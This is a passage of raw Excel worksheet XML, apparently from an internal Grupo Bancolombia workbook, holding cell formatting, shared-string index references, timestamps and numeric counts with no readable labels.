        <v>8</v>
      </c>
    </row>
    <row r="60" spans="2:3" ht="15" thickBot="1" x14ac:dyDescent="0.4">
      <c r="B60" s="69" t="s">
        <v>40</v>
      </c>
      <c r="C60" s="69">
        <v>4</v>
      </c>
    </row>
    <row r="65" spans="2:10" ht="15" thickBot="1" x14ac:dyDescent="0.4"/>
    <row r="66" spans="2:10" ht="26.5" thickBot="1" x14ac:dyDescent="0.65">
      <c r="B66" s="97" t="s">
        <v>41</v>
      </c>
      <c r="C66" s="98"/>
      <c r="D66" s="98"/>
      <c r="E66" s="98"/>
      <c r="F66" s="98"/>
      <c r="G66" s="98"/>
      <c r="H66" s="98"/>
      <c r="I66" s="98"/>
      <c r="J66" s="99"/>
    </row>
    <row r="79" spans="2:10" x14ac:dyDescent="0.35">
      <c r="C79" s="89" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="80" spans="2:10" x14ac:dyDescent="0.35">
      <c r="B80" s="89" t="s">
        <v>43</v>
      </c>
      <c r="C80" t="s">
        <v>44</v>
      </c>
      <c r="D80" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="81" spans="2:4" x14ac:dyDescent="0.35">
      <c r="B81" s="50" t="s">
        <v>46</v>
      </c>
      <c r="C81" s="87">
        <v>810083</v>
      </c>
      <c r="D81" s="87">
        <v>810083</v>
      </c>
    </row>
    <row r="82" spans="2:4" x14ac:dyDescent="0.35">
      <c r="B82" s="50" t="s">
        <v>47</v>
      </c>
      <c r="C82" s="87">
        <v>841425</v>
      </c>
      <c r="D82" s="87">
        <v>841425</v>
      </c>
    </row>
    <row r="83" spans="2:4" x14ac:dyDescent="0.35">
      <c r="B83" s="50" t="s">
        <v>48</v>
      </c>
      <c r="C83" s="87">
        <v>22365500</v>
      </c>
      <c r="D83" s="87">
        <v>22365500</v>
      </c>
    </row>
    <row r="84" spans="2:4" x14ac:dyDescent="0.35">
      <c r="B84" s="50" t="s">
        <v>49</v>
      </c>
      <c r="C84" s="87">
        <v>29405581</v>
      </c>
      <c r="D84" s="87">
        <v>29405581</v>
      </c>
    </row>
    <row r="85" spans="2:4" x14ac:dyDescent="0.35">
      <c r="B85" s="50" t="s">
        <v>50</v>
      </c>
      <c r="C85" s="87">
        <v>35310545</v>
      </c>
      <c r="D85" s="87">
        <v>35310545</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="B2:H2"/>
    <mergeCell ref="B22:G22"/>
    <mergeCell ref="B66:J66"/>
  </mergeCells>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup orientation="portrait" horizontalDpi="4294967293" verticalDpi="599" r:id="rId4"/>
  <headerFooter>
    <oddHeader>&amp;C&amp;G&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#</oddHeader>
  </headerFooter>
  <drawing r:id="rId5"/>
  <legacyDrawingHF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D3B3B-781A-4533-B5EB-2C3221DE35D4}">
  <sheetPr codeName="Hoja2"/>
  <dimension ref="A1:W1130"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="P1" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="E1" sqref="E1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="17.1796875" style="95" customWidth="1"/>
    <col min="2" max="2" width="15.6328125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="35.36328125" style="95" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="18.6328125" style="95" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="56.90625" style="95" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="9" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="60.6328125" style="95" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="81.08984375" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="40.36328125" customWidth="1"/>
    <col min="10" max="10" width="40.36328125" style="95" customWidth="1"/>
    <col min="11" max="11" width="40.36328125" style="95" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="20.36328125" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="38.6328125" style="95" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="49.90625" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="81.08984375" style="95" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="81.08984375" customWidth="1"/>
    <col min="17" max="17" width="81.08984375" style="95" customWidth="1"/>
    <col min="18" max="21" width="9" bestFit="1" customWidth="1"/>
    <col min="22" max="22" width="10" bestFit="1" customWidth="1"/>
    <col min="23" max="23" width="14.6328125" customWidth="1"/>
    <col min="24" max="24" width="64.90625" bestFit="1" customWidth="1"/>
    <col min="25" max="25" width="19.90625" bestFit="1" customWidth="1"/>
    <col min="26" max="26" width="19.54296875" bestFit="1" customWidth="1"/>
    <col min="27" max="27" width="14.6328125" customWidth="1"/>
    <col min="28" max="28" width="14.6328125" bestFit="1" customWidth="1"/>
    <col min="29" max="29" width="60.08984375" customWidth="1"/>
    <col min="30" max="30" width="81.08984375" bestFit="1" customWidth="1"/>
    <col min="31" max="31" width="12.08984375" bestFit="1" customWidth="1"/>
    <col min="32" max="32" width="60.08984375" bestFit="1" customWidth="1"/>
    <col min="33" max="34" width="14.6328125" bestFit="1" customWidth="1"/>
    <col min="35" max="35" width="14.6328125" customWidth="1"/>
    <col min="36" max="36" width="60.6328125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1" s="94" t="s">
        <v>1</v>
      </c>
      <c r="B1" t="s">
        <v>51</v>
      </c>
      <c r="C1" s="94" t="s">
        <v>52</v>
      </c>
      <c r="D1" s="94" t="s">
        <v>53</v>
      </c>
      <c r="E1" s="94" t="s">
        <v>54</v>
      </c>
      <c r="F1" s="44" t="s">
        <v>55</v>
      </c>
      <c r="G1" s="95" t="s">
        <v>56</v>
      </c>
      <c r="H1" s="41" t="s">
        <v>57</v>
      </c>
      <c r="I1" s="41" t="s">
        <v>58</v>
      </c>
      <c r="J1" s="94" t="s">
        <v>59</v>
      </c>
      <c r="K1" s="95" t="s">
        <v>8</v>
      </c>
      <c r="L1" t="s">
        <v>60</v>
      </c>
      <c r="M1" s="95" t="s">
        <v>61</v>
      </c>
      <c r="N1" t="s">
        <v>62</v>
      </c>
      <c r="O1" s="94" t="s">
        <v>63</v>
      </c>
      <c r="P1" s="41" t="s">
        <v>64</v>
      </c>
      <c r="Q1" s="94" t="s">
        <v>65</v>
      </c>
      <c r="R1" t="s">
        <v>66</v>
      </c>
      <c r="S1" t="s">
        <v>67</v>
      </c>
      <c r="T1" t="s">
        <v>68</v>
      </c>
      <c r="U1" t="s">
        <v>69</v>
      </c>
      <c r="V1" t="s">
        <v>70</v>
      </c>
      <c r="W1" s="41" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A2" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B2" s="52"/>
      <c r="C2" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D2" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E2" s="95" t="s">
        <v>73</v>
      </c>
      <c r="F2" s="42">
        <v>300</v>
      </c>
      <c r="G2" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H2" t="s">
        <v>74</v>
      </c>
      <c r="I2" t="s">
        <v>75</v>
      </c>
      <c r="J2" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K2" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L2" t="s">
        <v>77</v>
      </c>
      <c r="M2" s="95" t="s">
        <v>76</v>
      </c>
      <c r="P2" t="s">
        <v>78</v>
      </c>
      <c r="Q2" s="95" t="s">
        <v>79</v>
      </c>
      <c r="W2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="3" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A3" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B3" s="52"/>
      <c r="C3" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D3" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E3" s="95" t="s">
        <v>80</v>
      </c>
      <c r="F3" s="42">
        <v>100</v>
      </c>
      <c r="G3" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H3" t="s">
        <v>81</v>
      </c>
      <c r="I3" t="s">
        <v>82</v>
      </c>
      <c r="J3" s="95" t="s">
        <v>32</v>
      </c>
      <c r="K3" s="95" t="s">
        <v>32</v>
      </c>
      <c r="L3" t="s">
        <v>83</v>
      </c>
      <c r="M3" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P3" t="s">
        <v>84</v>
      </c>
      <c r="Q3" s="95" t="s">
        <v>85</v>
      </c>
      <c r="W3" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="4" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A4" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B4" s="52">
        <v>44615.792942893517</v>
      </c>
      <c r="C4" s="95" t="s">
        <v>86</v>
      </c>
      <c r="D4" s="96">
        <v>1910</v>
      </c>
      <c r="E4" s="95" t="s">
        <v>87</v>
      </c>
      <c r="F4" s="42">
        <v>135</v>
      </c>
      <c r="G4" s="95" t="s">
        <v>88</v>
      </c>
      <c r="H4" t="s">
        <v>89</v>
      </c>
      <c r="I4" t="s">
        <v>75</v>
      </c>
      <c r="J4" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K4" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L4" t="s">
        <v>77</v>
      </c>
      <c r="M4" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N4" t="s">
        <v>91</v>
      </c>
      <c r="O4" s="95" t="s">
        <v>92</v>
      </c>
      <c r="P4" t="s">
        <v>93</v>
      </c>
      <c r="Q4" s="95" t="s">
        <v>94</v>
      </c>
      <c r="R4">
        <v>7218059</v>
      </c>
      <c r="S4">
        <v>7597970</v>
      </c>
      <c r="T4">
        <v>7624365</v>
      </c>
      <c r="U4">
        <v>20972492</v>
      </c>
      <c r="V4">
        <v>30546239</v>
      </c>
      <c r="W4" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="5" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A5" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B5" s="52">
        <v>44117.594781631946</v>
      </c>
      <c r="C5" s="95" t="s">
        <v>96</v>
      </c>
      <c r="D5" s="96">
        <v>110</v>
      </c>
      <c r="E5" s="95" t="s">
        <v>97</v>
      </c>
      <c r="F5" s="42">
        <v>100</v>
      </c>
      <c r="G5" s="95" t="s">
        <v>98</v>
      </c>
      <c r="H5" t="s">
        <v>89</v>
      </c>
      <c r="I5" t="s">
        <v>75</v>
      </c>
      <c r="J5" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K5" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L5" t="s">
        <v>77</v>
      </c>
      <c r="M5" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N5" t="s">
        <v>91</v>
      </c>
      <c r="Q5" s="95" t="s">
        <v>99</v>
      </c>
      <c r="R5">
        <v>49937577</v>
      </c>
      <c r="S5">
        <v>41672613</v>
      </c>
      <c r="T5">
        <v>3285668</v>
      </c>
      <c r="U5">
        <v>53</v>
      </c>
      <c r="V5">
        <v>22</v>
      </c>
      <c r="W5" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="6" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A6" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B6" s="52">
        <v>44326.92819885417</v>
      </c>
      <c r="C6" s="95" t="s">
        <v>86</v>
      </c>
      <c r="D6" s="96">
        <v>130</v>
      </c>
      <c r="E6" s="95" t="s">
        <v>100</v>
      </c>
      <c r="F6" s="42">
        <v>110</v>
      </c>
      <c r="G6" s="95" t="s">
        <v>101</v>
      </c>
      <c r="H6" t="s">
        <v>102</v>
      </c>
      <c r="I6" t="s">
        <v>103</v>
      </c>
      <c r="J6" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K6" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L6" t="s">
        <v>77</v>
      </c>
      <c r="M6" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O6" s="95" t="s">
        <v>105</v>
      </c>
      <c r="Q6" s="95" t="s">
        <v>106</v>
      </c>
      <c r="R6">
        <v>1477</v>
      </c>
      <c r="S6">
        <v>5</v>
      </c>
      <c r="W6" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="7" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A7" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B7" s="52">
        <v>44117.59478162037</v>
      </c>
      <c r="C7" s="95" t="s">
        <v>96</v>
      </c>
      <c r="D7" s="96">
        <v>110</v>
      </c>
      <c r="E7" s="95" t="s">
        <v>108</v>
      </c>
      <c r="F7" s="42">
        <v>101</v>
      </c>
      <c r="G7" s="95" t="s">
        <v>109</v>
      </c>
      <c r="H7" t="s">
        <v>110</v>
      </c>
      <c r="I7" t="s">
        <v>75</v>
      </c>
      <c r="J7" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K7" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L7" t="s">
        <v>77</v>
      </c>
      <c r="M7" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N7" t="s">
        <v>91</v>
      </c>
      <c r="O7" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q7" s="95" t="s">
        <v>99</v>
      </c>
      <c r="R7">
        <v>4581</v>
      </c>
      <c r="S7">
        <v>3</v>
      </c>
      <c r="W7" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="8" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A8" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B8" s="52">
        <v>44522.621907337962</v>
      </c>
      <c r="C8" s="95" t="s">
        <v>86</v>
      </c>
      <c r="D8" s="96">
        <v>1910</v>
      </c>
      <c r="E8" s="95" t="s">
        <v>112</v>
      </c>
      <c r="F8" s="42">
        <v>112</v>
      </c>
      <c r="G8" s="95" t="s">
        <v>113</v>
      </c>
      <c r="H8" t="s">
        <v>114</v>
      </c>
      <c r="I8" t="s">
        <v>75</v>
      </c>
      <c r="J8" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K8" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L8" t="s">
        <v>77</v>
      </c>
      <c r="M8" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N8" t="s">
        <v>91</v>
      </c>
      <c r="Q8" s="95" t="s">
        <v>94</v>
      </c>
      <c r="R8">
        <v>6</v>
      </c>
      <c r="U8">
        <v>6</v>
      </c>
      <c r="V8">
        <v>403</v>
      </c>
      <c r="W8" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="9" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A9" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B9" s="52">
        <v>43656.052061863425</v>
      </c>
      <c r="C9" s="95" t="s">
        <v>86</v>
      </c>
      <c r="D9" s="96">
        <v>130</v>
      </c>
      <c r="E9" s="95" t="s">
        <v>115</v>
      </c>
      <c r="F9" s="42">
        <v>112</v>
      </c>
      <c r="G9" s="95" t="s">
        <v>116</v>
      </c>
      <c r="H9" t="s">
        <v>117</v>
      </c>
      <c r="I9" t="s">
        <v>103</v>
      </c>
      <c r="J9" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K9" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L9" t="s">
        <v>77</v>
      </c>
      <c r="M9" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P9" t="s">
        <v>93</v>
      </c>
      <c r="Q9" s="95" t="s">
        <v>106</v>
      </c>
      <c r="R9">
        <v>698</v>
      </c>
      <c r="S9">
        <v>1</v>
      </c>
      <c r="W9" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="10" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A10" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B10" s="52">
        <v>44615.792942881948</v>
      </c>
      <c r="C10" s="95" t="s">
        <v>86</v>
      </c>
      <c r="D10" s="96">
        <v>1910</v>
      </c>
      <c r="E10" s="95" t="s">
        <v>118</v>
      </c>
      <c r="F10" s="42">
        <v>143</v>
      </c>
      <c r="G10" s="95" t="s">
        <v>119</v>
      </c>
      <c r="H10" t="s">
        <v>120</v>
      </c>
      <c r="I10" t="s">
        <v>75</v>
      </c>
      <c r="J10" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K10" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L10" t="s">
        <v>77</v>
      </c>
      <c r="M10" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N10" t="s">
        <v>91</v>
      </c>
      <c r="O10" s="95" t="s">
        <v>121</v>
      </c>
      <c r="P10" t="s">
        <v>93</v>
      </c>
      <c r="Q10" s="95" t="s">
        <v>94</v>
      </c>
      <c r="R10">
        <v>9172</v>
      </c>
      <c r="S10">
        <v>2808</v>
      </c>
      <c r="T10">
        <v>2431</v>
      </c>
      <c r="U10">
        <v>485767</v>
      </c>
      <c r="V10">
        <v>722877</v>
      </c>
      <c r="W10" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="11" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A11" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B11" s="52">
        <v>44522.621907349538</v>
      </c>
      <c r="C11" s="95" t="s">
        <v>86</v>
      </c>
      <c r="D11" s="96">
        <v>1910</v>
      </c>
      <c r="E11" s="95" t="s">
        <v>122</v>
      </c>
      <c r="F11" s="42">
        <v>113</v>
      </c>
      <c r="G11" s="95" t="s">
        <v>123</v>
      </c>
      <c r="H11" t="s">
        <v>124</v>
      </c>
      <c r="I11" t="s">
        <v>75</v>
      </c>
      <c r="J11" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K11" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L11" t="s">
        <v>77</v>
      </c>
      <c r="M11" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N11" t="s">
        <v>91</v>
      </c>
      <c r="O11" s="95" t="s">
        <v>125</v>
      </c>
      <c r="Q11" s="95" t="s">
        <v>94</v>
      </c>
      <c r="R11">
        <v>3106</v>
      </c>
      <c r="S11">
        <v>2898</v>
      </c>
      <c r="T11">
        <v>2524</v>
      </c>
      <c r="U11">
        <v>2234</v>
      </c>
      <c r="V11">
        <v>3563</v>
      </c>
      <c r="W11" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="12" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A12" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B12" s="52">
        <v>44615.792942905093</v>
      </c>
      <c r="C12" s="95" t="s">
        <v>86</v>
      </c>
      <c r="D12" s="96">
        <v>1910</v>
      </c>
      <c r="E12" s="95" t="s">
        <v>126</v>
      </c>
      <c r="F12" s="42">
        <v>114</v>
      </c>
      <c r="G12" s="95" t="s">
        <v>127</v>
      </c>
      <c r="H12" t="s">
        <v>128</v>
      </c>
      <c r="I12" t="s">
        <v>75</v>
      </c>
      <c r="J12" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K12" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L12" t="s">
        <v>77</v>
      </c>
      <c r="M12" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N12" t="s">
        <v>91</v>
      </c>
      <c r="O12" s="95" t="s">
        <v>92</v>
      </c>
      <c r="P12" t="s">
        <v>93</v>
      </c>
      <c r="Q12" s="95" t="s">
        <v>94</v>
      </c>
      <c r="R12">
        <v>2978</v>
      </c>
      <c r="S12">
        <v>2779</v>
      </c>
      <c r="T12">
        <v>2425</v>
      </c>
      <c r="U12">
        <v>2122</v>
      </c>
      <c r="V12">
        <v>3449</v>
      </c>
      <c r="W12" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="13" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A13" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B13" s="52">
        <v>44522.621907372682</v>
      </c>
      <c r="C13" s="95" t="s">
        <v>86</v>
      </c>
      <c r="D13" s="96">
        <v>1910</v>
      </c>
      <c r="E13" s="95" t="s">
        <v>129</v>
      </c>
      <c r="F13" s="42">
        <v>112</v>
      </c>
      <c r="G13" s="95" t="s">
        <v>130</v>
      </c>
      <c r="H13" t="s">
        <v>131</v>
      </c>
      <c r="I13" t="s">
        <v>75</v>
      </c>
      <c r="J13" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K13" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L13" t="s">
        <v>77</v>
      </c>
      <c r="M13" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N13" t="s">
        <v>91</v>
      </c>
      <c r="O13" s="95" t="s">
        <v>132</v>
      </c>
      <c r="Q13" s="95" t="s">
        <v>94</v>
      </c>
      <c r="R13">
        <v>2964347</v>
      </c>
      <c r="S13">
        <v>2820676</v>
      </c>
      <c r="T13">
        <v>2716439</v>
      </c>
      <c r="U13">
        <v>2794985</v>
      </c>
      <c r="V13">
        <v>3217680</v>
      </c>
      <c r="W13" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="14" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A14" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B14" s="52">
        <v>44522.621907280096</v>
      </c>
      <c r="C14" s="95" t="s">
        <v>86</v>
      </c>
      <c r="D14" s="96">
        <v>1910</v>
      </c>
      <c r="E14" s="95" t="s">
        <v>133</v>
      </c>
      <c r="F14" s="42">
        <v>122</v>
      </c>
      <c r="G14" s="95" t="s">
        <v>134</v>
      </c>
      <c r="H14" t="s">
        <v>135</v>
      </c>
      <c r="I14" t="s">
        <v>75</v>
      </c>
      <c r="J14" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K14" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L14" t="s">
        <v>77</v>
      </c>
      <c r="M14" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N14" t="s">
        <v>91</v>
      </c>
      <c r="O14" s="95" t="s">
        <v>136</v>
      </c>
      <c r="Q14" s="95" t="s">
        <v>94</v>
      </c>
      <c r="R14">
        <v>7050</v>
      </c>
      <c r="S14">
        <v>8620</v>
      </c>
      <c r="T14">
        <v>5797</v>
      </c>
      <c r="U14">
        <v>4737</v>
      </c>
      <c r="V14">
        <v>7647</v>
      </c>
      <c r="W14" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="15" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A15" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B15" s="52">
        <v>44327.74064265046</v>
      </c>
      <c r="C15" s="95" t="s">
        <v>137</v>
      </c>
      <c r="D15" s="96">
        <v>110</v>
      </c>
      <c r="E15" s="95" t="s">
        <v>138</v>
      </c>
      <c r="F15" s="42">
        <v>110</v>
      </c>
      <c r="G15" s="95" t="s">
        <v>139</v>
      </c>
      <c r="H15" t="s">
        <v>140</v>
      </c>
      <c r="I15" t="s">
        <v>103</v>
      </c>
      <c r="J15" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K15" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L15" t="s">
        <v>77</v>
      </c>
      <c r="M15" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O15" s="95" t="s">
        <v>141</v>
      </c>
      <c r="Q15" s="95" t="s">
        <v>142</v>
      </c>
      <c r="W15" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="16" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A16" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B16" s="52">
        <v>44159.709903078707</v>
      </c>
      <c r="C16" s="95" t="s">
        <v>143</v>
      </c>
      <c r="D16" s="96">
        <v>100</v>
      </c>
      <c r="E16" s="95" t="s">
        <v>144</v>
      </c>
      <c r="F16" s="42">
        <v>200</v>
      </c>
      <c r="G16" s="95" t="s">
        <v>145</v>
      </c>
      <c r="H16" t="s">
        <v>146</v>
      </c>
      <c r="I16" t="s">
        <v>103</v>
      </c>
      <c r="J16" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K16" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L16" t="s">
        <v>83</v>
      </c>
      <c r="M16" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N16" t="s">
        <v>149</v>
      </c>
      <c r="O16" s="95" t="s">
        <v>150</v>
      </c>
      <c r="Q16" s="95" t="s">
        <v>151</v>
      </c>
      <c r="S16">
        <v>41</v>
      </c>
      <c r="T16">
        <v>754</v>
      </c>
      <c r="U16">
        <v>12804</v>
      </c>
      <c r="V16">
        <v>65709</v>
      </c>
      <c r="W16" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="17" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A17" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B17" s="52">
        <v>44706.679878750001</v>
      </c>
      <c r="C17" s="95" t="s">
        <v>152</v>
      </c>
      <c r="D17" s="96">
        <v>100</v>
      </c>
      <c r="E17" s="95" t="s">
        <v>153</v>
      </c>
      <c r="F17" s="42">
        <v>100</v>
      </c>
      <c r="G17" s="95" t="s">
        <v>154</v>
      </c>
      <c r="H17" t="s">
        <v>155</v>
      </c>
      <c r="I17" t="s">
        <v>156</v>
      </c>
      <c r="J17" s="95" t="s">
        <v>157</v>
      </c>
      <c r="K17" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L17" t="s">
        <v>77</v>
      </c>
      <c r="M17" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N17" t="s">
        <v>159</v>
      </c>
      <c r="O17" s="95" t="s">
        <v>160</v>
      </c>
      <c r="Q17" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W17" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="18" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A18" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B18" s="52"/>
      <c r="C18" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D18" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E18" s="95" t="s">
        <v>162</v>
      </c>
      <c r="F18" s="42">
        <v>100</v>
      </c>
      <c r="G18" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H18" t="s">
        <v>163</v>
      </c>
      <c r="I18" t="s">
        <v>75</v>
      </c>
      <c r="J18" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K18" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L18" t="s">
        <v>77</v>
      </c>
      <c r="M18" s="95" t="s">
        <v>76</v>
      </c>
      <c r="P18" t="s">
        <v>78</v>
      </c>
      <c r="Q18" s="95" t="s">
        <v>164</v>
      </c>
      <c r="W18" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="19" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A19" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B19" s="52"/>
      <c r="C19" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D19" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E19" s="95" t="s">
        <v>165</v>
      </c>
      <c r="F19" s="42">
        <v>100</v>
      </c>
      <c r="G19" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H19" t="s">
        <v>166</v>
      </c>
      <c r="I19" t="s">
        <v>75</v>
      </c>
      <c r="J19" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K19" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L19" t="s">
        <v>83</v>
      </c>
      <c r="M19" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N19" t="s">
        <v>167</v>
      </c>
      <c r="P19" t="s">
        <v>168</v>
      </c>
      <c r="Q19" s="95" t="s">
        <v>169</v>
      </c>
      <c r="W19" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="20" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A20" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B20" s="52"/>
      <c r="C20" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D20" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E20" s="95" t="s">
        <v>170</v>
      </c>
      <c r="F20" s="42">
        <v>100</v>
      </c>
      <c r="G20" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H20" t="s">
        <v>171</v>
      </c>
      <c r="I20" t="s">
        <v>172</v>
      </c>
      <c r="J20" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K20" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L20" t="s">
        <v>83</v>
      </c>
      <c r="M20" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N20" t="s">
        <v>174</v>
      </c>
      <c r="P20" t="s">
        <v>175</v>
      </c>
      <c r="Q20" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W20" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="21" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A21" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B21" s="52"/>
      <c r="C21" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D21" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E21" s="95" t="s">
        <v>177</v>
      </c>
      <c r="F21" s="42">
        <v>100</v>
      </c>
      <c r="G21" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H21" t="s">
        <v>178</v>
      </c>
      <c r="I21" t="s">
        <v>179</v>
      </c>
      <c r="J21" s="95" t="s">
        <v>180</v>
      </c>
